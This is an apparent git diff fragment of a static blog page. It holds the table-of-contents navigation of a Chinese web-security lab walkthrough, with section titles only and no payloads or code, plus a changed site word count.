< div class = "post-toc-content" > < ol class = "nav" > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#搭建环境" > < span class = "nav-text" > 搭建环境< / span > < / a > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#暴力破解" > < span class = "nav-text" > 暴力破解< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#命令执行" > < span class = "nav-text" > 命令执行< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-1" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-1" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#CSRF" > < span class = "nav-text" > CSRF< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-2" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-2" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#文件包含" > < span class = "nav-text" > 文件包含< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-3" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-3" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#文件上传" > < span class = "nav-text" > 文件上传< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-4" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-4" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#SQL注入" > < span class = "nav-text" > SQL注入< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-5" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-5" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#SQL盲注" > < span class = "nav-text" > SQL盲注< / span > < / a > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#弱session-id" > < span class = "nav-text" > 弱session-id< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-6" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-6" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#基于DOM的XSS" > < span class = "nav-text" > 基于DOM的XSS< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-7" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-7" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-8" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "# 存储 型xss"> < span class = "nav-text" > 存储 型xss< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-8" > < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式- 9 "> < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "# 绕过安全策略"> < span class = "nav-text" > 绕过安全策略< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式-9 "> < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式-10" > < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-1" > < a class = "nav-link" href = "#JavaScript-Attacks" > < span class = "nav-text" > JavaScript Attack s< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#easy模式- 10 "> < span class = "nav-text" > easy模式< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#medium模式- 11 "> < span class = "nav-text" > medium模式< / span > < / a > < / li > < / ol > < / li > < / ol > < / div >
< / div >
< / div >
@ -844,7 +830,7 @@
< i class = "fa fa-area-chart" > < / i >
< i class = "fa fa-area-chart" > < / i >
< / span >
< / span >
< span title = "Site words total count" > 64.5 k< / span >
< span title = "Site words total count" > 64.4 k< / span >
< / div > < / div >
Cool-Y